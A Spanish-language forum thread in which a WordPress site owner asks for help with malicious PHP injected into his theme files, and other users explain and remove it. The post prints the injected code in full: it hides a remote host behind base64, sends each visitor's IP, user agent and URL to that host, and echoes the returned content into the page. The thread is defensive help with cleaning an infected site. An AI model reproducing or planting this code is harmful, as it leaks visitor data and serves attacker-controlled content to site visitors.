Identificación de código malicioso en mi sitio web, necesito ayuda

sebastiani

Gamma

Verificado por Whatsapp

¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!

• 6 May 2013

• #1

Buenas noches

Tengo un problema que me tiene loco, en chrome me sale este mensaje "Este sitio web contiene software malicioso" ya he enviado las reconsideraciones mediante el enlace de webmaster tool's google y me han respondido que mi web esta infectado, buscando en internet he encontrado algo que coincide con lo que mi web tiene, este fragmento de código en mi INDEX, alguien me podría indicar que significa que hace y si tan solo con eliminarlo bastaría para que me levante esa observación.

PHP:

get_header(); ?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

---------- Post agregado el 07-may-2013 hora: 04:43 ----------

Ya decodifique base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw'). y es esto http://mbrowserstats.com/statH/stat.php

 

CarcaBot

Épsilon

Verificación en dos pasos activada

• 6 May 2013

• #2

el codigo que viene encriptado en base64 lo haz puesto vos?

 

Cicklow

Admin

Épsilon

Verificado

Verificación en dos pasos activada

Verificado por Whatsapp

¡Ha verificado su Paypal!

¡Usuario popular!

Suscripción a IA

• 6 May 2013

• #3

Lo que hace es enviar datos a: http://mbrowserstats.com/statH/stat.php de los usuarios que visitan tu web. y cuando el sitio le regresa algo lo coloca en tu web, y eso es lo que detecta el boot de google! elimina ese code, no afecta el theme.

 

N

NIKC

Préstamo

No recomendado

Verificado por Whatsapp

¡Ha verificado su Paypal!

• 6 May 2013

• #4

Creo que no siempre chrome marca ese error por el codigo de tu blog ami una vez me lo marco en mi sitio por una imagen que era de un sitio ajeno que no aceptaba chrome y me dejo de marcar ese error hasta que borre esa imagen

 

BuyHostingWeb

Épsilon

Hospedaje

Verificación en dos pasos activada

Verificado por Whatsapp

Verificado por Binance

• 7 May 2013

• #5

Hola, es un virus que conozco muy bien, lo que hace es infectar a muchos clientes del mismo servidor y si tienes mas cuentas en el mismo servidor verás que también están infectados, lo primero que se debe hacer es pasarle un antivirus al servidor, luego debes cambiar tus contraseñas cpanel/ftp y ver si no tienes ningún malware en la pc y si necesitas mas seguridad le puedes cambiar los permisos a tus archivos por 444

 

Canopix

Kappa

Verificación en dos pasos activada

Verificado por Whatsapp

• 7 May 2013

• #6

Borra el código base64 y listo

 

Cicklow

Admin

Épsilon

Verificado

Verificación en dos pasos activada

Verificado por Whatsapp

¡Ha verificado su Paypal!

¡Usuario popular!

Suscripción a IA

• 7 May 2013

• #7

sebastiani dijo:

Buenas noches

Hacer clic para expandir...

WordPress › Support » Security Problem
google!

 

zcriptz

1

Ómicron

Programador

Verificación en dos pasos activada

Verificado por Whatsapp

Suscripción a IA

• 7 May 2013

• #8

Debes sacarlo de tu codigo!

 

Koletta

Dseda

Verificación en dos pasos activada

Verificado por Whatsapp

¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!

• 7 May 2013

• #9

Elimina el código maliciosos que no hayas insertado tú y marchando 😎

 

sebastiani

Gamma

Verificado por Whatsapp

¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!

• 7 May 2013

• #10

Muchas gracias a todos, eliminé esa fracción de código y problema solucionado; chrome ya no me detecta como web sospechosa, todo quedó OK.
Gracias!:

 

sebastiani

Gamma

Verificado por Whatsapp

¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!

• 11 May 2013

• #11

Me volvieron a insertar el mismo código que podría estar pasando.

 

R

Ricky Mods

Gamma

¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!

• 11 May 2013

• #12

sebastiani dijo:

Muchas gracias a todos, eliminé esa fracción de código y problema solucionado; chrome ya no me detecta como web sospechosa, todo quedó OK.
Gracias!:

Hacer clic para expandir...

Oye amigo a mi me paso hace dias un problema similar , solo a amigos que usan el antivirus "AVAST" les salia ese mensaje igual que a mi, despues estuve buscando mas plantillas en la web de btemplates y me fijaba en Demo para ver como eran y me marcaban virus , creo que muchas plantillas estaba infectadas , pero como te digo solo Avast las detectaba , te dejare una captura a ver si sabes cual es el problema ya que no quiero que vuelva a pasar porque luego se pierden visitas porque hay muchos que son muy desconfiados cuando les aparece un mensaje que hay un virus troyano :s , mi sitio es de blogger.

 

sebastiani

Gamma

Verificado por Whatsapp

¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!

• 11 May 2013

• #13

El nod32 me detecta el virus y efectivamente pasaba lo que sospechaba, el codihggo que menciono loneas arriba aparecía una vez más en el index.psp , page.php y footer.php; acabo de borrarlos y el antivirus ya no me detecta nada, tanbién te dejo la captura.

Toreto Mods dijo:

Oye amigo a mi me paso hace dias un problema similar , solo a amigos que usan el antivirus "AVAST" les salia ese mensaje igual que a mi, despues estuve buscando mas plantillas en la web de btemplates y me fijaba en Demo para ver como eran y me marcaban virus , creo que muchas plantillas estaba infectadas , pero como te digo solo Avast las detectaba , te dejare una captura a ver si sabes cual es el problema ya que no quiero que vuelva a pasar porque luego se pierden visitas porque hay muchos que son muy desconfiados cuando les aparece un mensaje que hay un virus troyano :s , mi sitio es de blogger.
Ver el archivo adjunto 14050

Hacer clic para expandir...

 

ramonjosegn

Sigma

Verificación en dos pasos activada

Verificado por Whatsapp

¡Usuario popular!

• 11 May 2013

• #14

Lo que me pregunto es porqué no estás usando Wordfence, no sólo te protege sino que además te deja restaurar los archivos comparándolos con los que hay en el repertorio de Wordpress -aunque se comparan con los ingleses, así que es posible que algunos los restaure al idioma inglés-, si es un plugin escríbele al autor y dile que está siendo vulnerado... amigo [MENTION=24452]sebastiani[/MENTION]

http://wordpress.org/extend/plugins/wordfence/

 

Última edición: 11 May 2013